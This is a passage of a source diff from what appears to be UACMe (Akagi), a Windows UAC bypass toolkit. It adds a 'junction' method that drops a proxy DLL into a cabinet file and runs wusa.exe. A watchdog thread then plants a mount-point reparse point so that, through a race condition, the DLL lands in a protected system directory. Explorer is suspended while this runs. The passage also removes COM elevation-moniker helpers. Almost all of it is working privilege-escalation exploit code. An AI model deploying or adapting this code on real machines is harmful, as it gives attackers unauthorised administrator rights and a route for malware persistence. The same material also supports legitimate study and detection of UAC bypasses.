{ MethodEnigma0x3_2, NULL, { 7600, 15031 }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodExpLife, NULL, { 7600, 16199 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodSandworm, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE },
- { MethodEnigma0x3_3, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
+ { MethodEnigma0x3_3, NULL, { 10240, 16215 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodWow64Logger, NULL, { 7600, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
+ { MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
+ { MethodJunction, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};
/*
@@ -686,3 +688,11 @@ UCM_API(MethodTokenMod)
return ucmTokenModification(lpszPayload);
}
+
+UCM_API(MethodJunction)
+{
+ UNREFERENCED_PARAMETER(Method);
+ UNREFERENCED_PARAMETER(ExtraContext);
+
+ return ucmJunctionMethod(PayloadCode, PayloadSize);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 8e18875..4ba86b7 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -55,6 +55,7 @@ typedef enum _UCM_METHOD {
UacMethodMsSettings, //+
UacMethodTyranid, //+
UacMethodTokenMod, //+
+ UacMethodJunction, //+
UacMethodMax
} UCM_METHOD;
@@ -88,6 +89,8 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
BOOL SetParameterInRegistry;
} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;
+#include "comfileop.h"
+#include "wusa.h"
#include "pitou.h"
#include "simda.h"
#include "explife.h"
diff --git a/Source/Akagi/methods/pitou.c b/Source/Akagi/methods/pitou.c
index 1286a7a..4fb4e75 100644
--- a/Source/Akagi/methods/pitou.c
+++ b/Source/Akagi/methods/pitou.c
@@ -4,9 +4,9 @@
*
* TITLE: PITOU.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 07 May 2017
+* DATE: 10 June 2017
*
* Leo Davidson based IFileOperation auto-elevation.
*
@@ -18,283 +18,6 @@
*******************************************************************************/
#include "global.h"
-/*
-* ucmMasqueradedRenameElementCOM
-*
-* Purpose:
-*
-* Rename file/directory autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedRenameElementCOM(
- _In_ LPWSTR OldName,
- _In_ LPWSTR NewName
-)
-{
- BOOL bCond = FALSE, bResult = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *psiDestDir = NULL;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((OldName == NULL) || (NewName == NULL))
- break;
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK) {
- break;
- }
-
- psiDestDir->lpVtbl->Release(psiDestDir);
- psiDestDir = NULL;
-
- bResult = TRUE;
-
- } while (bCond);
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- if (psiDestDir != NULL) {
- psiDestDir->lpVtbl->Release(psiDestDir);
- }
-
- return bResult;
-}
-
-/*
-* ucmMasqueradedCreateSubDirectoryCOM
-*
-* Purpose:
-*
-* Create directory autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedCreateSubDirectoryCOM(
- _In_ LPWSTR ParentDirectory,
- _In_ LPWSTR SubDirectory
-)
-{
- BOOL bCond = FALSE, bResult = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *psiDestDir = NULL;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((SubDirectory == NULL) || (ParentDirectory == NULL))
- break;
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK) {
- break;
- }
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
- if (r != S_OK) {
- break;
- }
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK) {
- break;
- }
-
- psiDestDir->lpVtbl->Release(psiDestDir);
- psiDestDir = NULL;
-
- bResult = TRUE;
-
- } while (bCond);
-
- if (FileOperation1 != NULL) {
- FileOperation1->lpVtbl->Release(FileOperation1);
- }
-
- if (psiDestDir != NULL) {
- psiDestDir->lpVtbl->Release(psiDestDir);
- }
-
- return bResult;
-}
-
-/*
-* ucmMasqueradedMoveCopyFileCOM
-*
-* Purpose:
-*
-* Move or Copy file autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedMoveCopyFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir,
- _In_ BOOL fMove
-)
-{
- BOOL cond = FALSE;
- IFileOperation *FileOperation1 = NULL;
- IShellItem *isrc = NULL, *idst = NULL;
- SHELLEXECUTEINFOW shexec;
- HRESULT r = E_FAIL;
-
- do {
-
- if ((SourceFileName == NULL) || (DestinationDir == NULL))
- break;
-
- RtlSecureZeroMemory(&shexec, sizeof(shexec));
-
- r = CoCreateInstance(&CLSID_FileOperation, NULL,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
-
- if (r != S_OK)
- break;
-
- if (FileOperation1 != NULL)
- FileOperation1->lpVtbl->Release(FileOperation1);
-
- r = ucmMasqueradedCoGetObjectElevate(
- T_CLSID_FileOperation,
- CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
- &IID_IFileOperation,
- &FileOperation1);
-
- if (r != S_OK)
- break;
-
- if (FileOperation1 == NULL) {
- r = E_FAIL;
- break;
- }
-
- FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
-
- r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
- if (r != S_OK)
- break;
-
- r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
- if (r != S_OK)
- break;
-
- if (fMove)
- r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
- else
- r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
-
- if (r != S_OK)
- break;
-
- r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
- if (r != S_OK)
- break;
-
- idst->lpVtbl->Release(idst);
- idst = NULL;
- isrc->lpVtbl->Release(isrc);
- isrc = NULL;
-
- } while (cond);
-
- if (FileOperation1 != NULL)
- FileOperation1->lpVtbl->Release(FileOperation1);
-
- if (isrc != NULL)
- isrc->lpVtbl->Release(isrc);
-
- if (idst != NULL)
- idst->lpVtbl->Release(idst);
-
- return (SUCCEEDED(r));
-}
-
-/*
-* ucmMasqueradedMoveFileCOM
-*
-* Purpose:
-*
-* Move file autoelevated.
-* This function expects that supMasqueradeProcess was called on process initialization.
-*
-*/
-BOOL ucmMasqueradedMoveFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir
-)
-{
- return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
-}
-
/*
* ucmStandardAutoElevation2
*
@@ -479,40 +202,3 @@ BOOL ucmStandardAutoElevation(
return bResult;
}
-
-/*
-* ucmMasqueradedCoGetObjectElevate
-*
-* Purpose:
-*
-* CoGetObject elevation as admin.
-*
-*/
-HRESULT ucmMasqueradedCoGetObjectElevate(
- _In_ LPWSTR clsid,
- _In_ DWORD dwClassContext,
- _In_ REFIID riid,
- _Outptr_ void **ppv
-)
-{
- HRESULT r = E_FAIL;
- BIND_OPTS3 bop;
- WCHAR szElevationMoniker[MAX_PATH];
-
- if (clsid == NULL)
- return r;
-
- if (_strlen(clsid) > 64)
- return r;
-
- RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
-
- _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
- _strcat(szElevationMoniker, clsid);
-
- RtlSecureZeroMemory(&bop, sizeof(bop));
- bop.cbStruct = sizeof(bop);
- bop.dwClassContext = dwClassContext;
-
- return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
-}
diff --git a/Source/Akagi/methods/pitou.h b/Source/Akagi/methods/pitou.h
index 20b440f..0782923 100644
--- a/Source/Akagi/methods/pitou.h
+++ b/Source/Akagi/methods/pitou.h
@@ -4,9 +4,9 @@
*
* TITLE: PITOU.H
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 10 June 2017
*
* Prototypes and definitions for Leo Davidson method.
*
@@ -26,26 +26,3 @@ BOOL ucmStandardAutoElevation(
BOOL ucmStandardAutoElevation2(
CONST PVOID ProxyDll,
DWORD ProxyDllSize);
-
-BOOL ucmMasqueradedCreateSubDirectoryCOM(
- _In_ LPWSTR ParentDirectory,
- _In_ LPWSTR SubDirectory);
-
-BOOL ucmMasqueradedMoveCopyFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir,
- _In_ BOOL fMove);
-
-BOOL ucmMasqueradedMoveFileCOM(
- _In_ LPWSTR SourceFileName,
- _In_ LPWSTR DestinationDir);
-
-BOOL ucmMasqueradedRenameElementCOM(
- _In_ LPWSTR OldName,
- _In_ LPWSTR NewName);
-
-HRESULT ucmMasqueradedCoGetObjectElevate(
- _In_ LPWSTR clsid,
- _In_ DWORD dwClassContext,
- _In_ REFIID riid,
- _Outptr_ void **ppv);
diff --git a/Source/Akagi/methods/tyranid.c b/Source/Akagi/methods/tyranid.c
index 7e3be40..7286b28 100644
--- a/Source/Akagi/methods/tyranid.c
+++ b/Source/Akagi/methods/tyranid.c
@@ -4,15 +4,18 @@
*
* TITLE: TYRANID.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 11 June 2017
*
* James Forshaw autoelevation method(s)
* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
+* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -192,7 +195,7 @@ BOOL ucmTokenModification(
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
- sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
+ (ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(
diff --git a/Source/Akagi/methods/wusa.c b/Source/Akagi/methods/wusa.c
new file mode 100644
index 0000000..0aa3cbf
--- /dev/null
+++ b/Source/Akagi/methods/wusa.c
@@ -0,0 +1,426 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: WUSA.C
+*
+* VERSION: 2.74
+*
+* DATE: 20 June 2017
+*
+* Windows Update Standalone Installer (WUSA) based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#include "makecab.h"
+
+/*
+* ucmWusaExtractPackage
+*
+* Purpose:
+*
+* Extract cab to protected directory using wusa.
+* This routine expect source as ellocnak.msu cab file in the %temp% folder.
+*
+*/
+BOOL ucmWusaExtractPackage(
+ _In_ LPWSTR lpTargetDirectory
+)
+{
+ BOOL bResult = FALSE;
+ SIZE_T Size;
+ LPWSTR lpCommandLine = NULL;
+ WCHAR szMsuFileName[MAX_PATH * 2];
+
+ if (lpTargetDirectory == NULL)
+ return FALSE;
+
+ RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
+ _strcpy(szMsuFileName, g_ctx.szTempDirectory);
+ _strcat(szMsuFileName, ELLOCNAK_MSU);
+
+ Size = ((1 + _strlen(lpTargetDirectory) +
+ _strlen(szMsuFileName) +
+ MAX_PATH) * sizeof(WCHAR));
+
+ lpCommandLine = (LPWSTR)supHeapAlloc(Size);
+ if (lpCommandLine) {
+
+ _strcpy(lpCommandLine, L"/c wusa ");
+ _strcat(lpCommandLine, szMsuFileName);
+ _strcat(lpCommandLine, L" /extract:");
+ _strcat(lpCommandLine, lpTargetDirectory);
+
+ bResult = supRunProcess(CMD_EXE, lpCommandLine);
+
+ supHeapFree(lpCommandLine);
+ }
+ DeleteFile(szMsuFileName);
+ return bResult;
+}
+
+/*
+* ucmCreateCabinetForSingleFile
+*
+* Purpose:
+*
+* Build cabinet for usage in methods where required 1 file.
+*
+*/
+BOOL ucmCreateCabinetForSingleFile(
+ _In_ LPWSTR lpSourceDll,
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize
+)
+{
+ BOOL cond = FALSE, bResult = FALSE;
+ CABDATA *Cabinet = NULL;
+ LPWSTR lpFileName;
+ WCHAR szMsuFileName[MAX_PATH * 2];
+
+ if ((ProxyDll == NULL) ||
+ (ProxyDllSize == 0) ||
+ (lpSourceDll == NULL)) return bResult;
+
+ do {
+
+ //drop proxy dll
+ if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
+ break;
+ }
+
+ //build cabinet
+ RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
+ _strcpy(szMsuFileName, g_ctx.szTempDirectory);
+ _strcat(szMsuFileName, ELLOCNAK_MSU);
+
+ Cabinet = cabCreate(szMsuFileName);
+ if (Cabinet == NULL)
+ break;
+
+ lpFileName = _filename(lpSourceDll);
+ //put file without compression
+ bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
+ cabClose(Cabinet);
+
+ } while (cond);
+
+ return bResult;
+}
+
+volatile ULONG g_ThreadFinished = 0;
+
+/*
+* ucmxInvokeWusaThread
+*
+* Purpose:
+*
+* Start wusa and wait a bit.
+*
+*/
+DWORD ucmxInvokeWusaThread(
+ PVOID Param)
+{
+ SHELLEXECUTEINFO shinfo;
+ WCHAR szProcess[MAX_PATH * 2];
+ WCHAR szParameters[MAX_PATH * 3];
+
+ UNREFERENCED_PARAMETER(Param);
+
+ InterlockedExchange((LONG*)&g_ThreadFinished, 0);
+
+ RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
+
+ _strcpy(szProcess, g_ctx.szSystemDirectory);
+ _strcat(szProcess, WUSA_EXE);
+
+ RtlSecureZeroMemory(szParameters, sizeof(szParameters));
+ _strcpy(szParameters, TEXT(" /quiet "));
+ _strcat(szParameters, g_ctx.szTempDirectory);
+ _strcat(szParameters, ELLOCNAK_MSU);
+
+ shinfo.cbSize = sizeof(shinfo);
+ shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;
+ shinfo.lpFile = szProcess;
+ shinfo.lpParameters = szParameters;
+ shinfo.nShow = SW_HIDE;
+
+ if (ShellExecuteEx(&shinfo)) {
+
+ if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)
+ TerminateProcess(shinfo.hProcess, 0);
+
+ CloseHandle(shinfo.hProcess);
+ InterlockedExchange((LONG*)&g_ThreadFinished, 1);
+ }
+ return 0;
+}
+
+/*
+* ucmxDirectoryWatchdogThread
+*
+* Purpose:
+*
+* Monitor directory creation in system root directory.
+* When it happened - set reparse point.
+*
+*/
+DWORD ucmxDirectoryWatchdogThread(
+ PVOID Param)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ NTSTATUS status;
+
+ HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;
+ IO_STATUS_BLOCK IoStatusBlock;
+ OBJECT_ATTRIBUTES ObjectAttributes;
+
+ LPWSTR lpTargetDirectory = (LPWSTR)Param;
+
+ PVOID Buffer = NULL;
+ SIZE_T memIO = 0;
+ FILE_NOTIFY_INFORMATION *pInfo = NULL;
+
+ LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL;
+
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;
+
+
+ do {
+
+ //
+ // Convert target directory path to native form.
+ //
+ usTargetDirectory.Buffer = NULL;
+ if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))
+ break;
+
+ //
+ // Convert watch directory path to native form.
+ //
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ szBuffer[0] = L'\\';
+ szBuffer[1] = L'?';
+ szBuffer[2] = L'?';
+ szBuffer[3] = L'\\';
+ _strncpy(&szBuffer[4], MAX_PATH, g_ctx.szSystemDirectory, 3);
+
+ //
+ // Open directory for change notification.
+ //
+ usWatchDirectory.Buffer = NULL;
+ RtlInitUnicodeString(&usWatchDirectory, szBuffer);
+ InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL);
+
+ status = NtCreateFile(&hDirectory,
+ FILE_LIST_DIRECTORY | SYNCHRONIZE,
+ &ObjectAttributes,
+ &IoStatusBlock,
+ NULL,
+ FILE_OPEN_FOR_BACKUP_INTENT,
+ FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+ FILE_OPEN,
+ FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
+ NULL,
+ 0);
+
+ if (!NT_SUCCESS(status))
+ break;
+
+ memIO = 1024 * 1024;
+ Buffer = supHeapAlloc(memIO);
+ if (Buffer == NULL)
+ break;
+
+ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
+ status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
+ if (!NT_SUCCESS(status))
+ break;
+
+ //
+ // Watch for directory changes.
+ //
+ do {
+
+ status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
+ &IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);
+
+ if (status == STATUS_PENDING)
+ NtWaitForSingleObject(hEvent, TRUE, NULL);
+
+ NtSetEvent(hEvent, NULL);
+
+ pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
+ for (;;) {
+
+ if (pInfo->Action == FILE_ACTION_ADDED) {
+
+ memIO = pInfo->FileNameLength +
+ ((1 + _strlen(szBuffer)) * sizeof(WCHAR));
+
+ CapturedDirectoryName = supHeapAlloc(memIO);
+
+ if (CapturedDirectoryName) {
+ _strcpy(CapturedDirectoryName, szBuffer);
+ lpEnd = _strend(CapturedDirectoryName);
+ RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);
+
+ //
+ // Open new directory to set reparse point.
+ //
+ usReparseDirectory.Buffer = NULL;
+ RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
+ InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtCreateFile(&hReparseDirectory,
+ FILE_ALL_ACCESS,
+ &ObjectAttributes,
+ &IoStatusBlock,
+ NULL,
+ 0,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ FILE_OPEN,
+ FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
+ NULL,
+ 0);
+
+ if (NT_SUCCESS(status)) {
+
+ //
+ // Set reparse point.
+ //
+ bResult = supSetMountPoint(hReparseDirectory,
+ usTargetDirectory.Buffer,
+ lpTargetDirectory);
+
+ }
+
+ status = STATUS_NO_SECRETS;
+ }
+
+ } //Action
+
+ if (status == STATUS_NO_SECRETS)
+ break;
+
+ pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
+ if (pInfo->NextEntryOffset == 0)
+ break;
+ }
+
+ } while (NT_SUCCESS(status));
+
+ } while (bCond);
+
+ //
+ // Cleanup.
+ //
+ if (hEvent)
+ NtClose(hEvent);
+
+ if (hDirectory != NULL)
+ NtClose(hDirectory);
+
+ if (usTargetDirectory.Buffer)
+ RtlFreeUnicodeString(&usTargetDirectory);
+
+ if (Buffer != NULL)
+ supHeapFree(Buffer);
+
+ //
+ // Remove reparse point.
+ //
+ if (CapturedDirectoryName) {
+
+ while (g_ThreadFinished != 1)
+ Sleep(100);
+
+ if (hReparseDirectory) {
+ supDeleteMountPoint(hReparseDirectory);
+ NtClose(hReparseDirectory);
+ }
+
+ RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
+ InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ NtDeleteFile(&ObjectAttributes);
+ supHeapFree(CapturedDirectoryName);
+ }
+
+ return (DWORD)bResult;
+}
+
+/*
+* ucmWusaExtractViaJunction
+*
+* Purpose:
+*
+* Extract cab contents to the specified directory by initializing wusa race condition.
+* This routine expect source as ellocnak.msu cab file in the %temp% folder.
+*
+*/
+BOOL ucmWusaExtractViaJunction(
+ _In_ LPWSTR lpTargetDirectory
+)
+{
+ BOOL bCond = FALSE;
+
+#ifndef _DEBUG
+ HANDLE hExplorer = NULL;
+#endif
+
+ HANDLE hWatchdogThread, hWusaThread;
+ DWORD ti;
+
+ //
+ // Query explorer.exe handle and use it to suspend process.
+ // Thus blocking unwanted user changes during work.
+ //
+#ifndef _DEBUG
+ hExplorer = supGetExplorerHandle();
+ if (hExplorer != NULL) {
+ NtSuspendProcess(hExplorer);
+ }
+#endif
+
+ do {
+
+ //
+ // Run watchdog thread.
+ //
+ hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);
+ if (hWatchdogThread == NULL)
+ break;
+
+ //
+ // Run wusa in separate thread.
+ //
+ hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);
+ if (hWusaThread) {
+ if (WaitForSingleObject(hWusaThread, 5000) == WAIT_TIMEOUT)
+ TerminateThread(hWusaThread, 0);
+
+ CloseHandle(hWusaThread);
+ }
+
+ if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)
+ TerminateThread(hWatchdogThread, 0);
+
+ CloseHandle(hWatchdogThread);
+
+ } while (bCond);
+
+#ifndef _DEBUG
+ if (hExplorer != NULL) {
+ NtResumeProcess(hExplorer);
+ NtClose(hExplorer);
+ }
+#endif
+
+ return (g_ThreadFinished == 1);
+}
diff --git a/Source/Akagi/methods/wusa.h b/Source/Akagi/methods/wusa.h
new file mode 100644
index 0000000..6b160bf
--- /dev/null
+++ b/Source/Akagi/methods/wusa.h
@@ -0,0 +1,30 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: WUSA.H
+*
+* VERSION: 2.74
+*
+* DATE: 20 June 2017
+*
+* Prototypes and definitions for Windows Update Standalone Installer (WUSA) based methods.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+BOOL ucmWusaExtractPackage(
+ _In_ LPWSTR lpTargetDirectory);
+
+BOOL ucmCreateCabinetForSingleFile(
+ _In_ LPWSTR lpSourceDll,
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize);
+
+BOOL ucmWusaExtractViaJunction(
+ _In_ LPWSTR lpTargetDirectory);
diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c
index 470fd07..f04e041 100644
--- a/Source/Akagi/sup.c
+++ b/Source/Akagi/sup.c
@@ -4,9 +4,9 @@
*
* TITLE: SUP.C
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 20 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -109,6 +109,32 @@ BOOL supGetElevationType(
return (NT_SUCCESS(status));
}
+/*
+* supGetExplorerHandle
+*
+* Purpose:
+*
+* Returns Explorer process handle opened with maximum allowed rights or NULL on error.
+*
+*/
+HANDLE supGetExplorerHandle(
+ VOID
+)
+{
+ HWND hTrayWnd = NULL;
+ DWORD dwProcessId = 0;
+
+ hTrayWnd = FindWindow(TEXT("Shell_TrayWnd"), NULL);
+ if (hTrayWnd == NULL)
+ return NULL;
+
+ GetWindowThreadProcessId(hTrayWnd, &dwProcessId);
+ if (dwProcessId == 0)
+ return NULL;
+
+ return OpenProcess(MAXIMUM_ALLOWED, FALSE, dwProcessId);
+}
+
/*
* supWriteBufferToFile
*
@@ -312,7 +338,7 @@ BOOL supRunProcess2(
)
{
BOOL bResult;
- SHELLEXECUTEINFOW shinfo;
+ SHELLEXECUTEINFO shinfo;
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
if (lpszProcessName == NULL)
@@ -324,7 +350,7 @@ BOOL supRunProcess2(
shinfo.lpParameters = lpszParameters;
shinfo.lpDirectory = NULL;
shinfo.nShow = SW_SHOW;
- bResult = ShellExecuteExW(&shinfo);
+ bResult = ShellExecuteEx(&shinfo);
if (bResult) {
if (fWait)
WaitForSingleObject(shinfo.hProcess, 0x8000);
@@ -852,7 +878,7 @@ DWORD supExpandEnvironmentStrings(
&Length
);
if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {
- return(Length / sizeof(WCHAR));
+ return (DWORD)(Length / sizeof(WCHAR));
}
else {
RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
@@ -1122,3 +1148,130 @@ BOOL supSetEnvVariable(
return bResult;
}
+
+/*
+* supDeleteMountPoint
+*
+* Purpose:
+*
+* Removes reparse point of type mount_point from directory.
+*
+*/
+BOOL supDeleteMountPoint(
+ _In_ HANDLE hDirectory
+)
+{
+ NTSTATUS status;
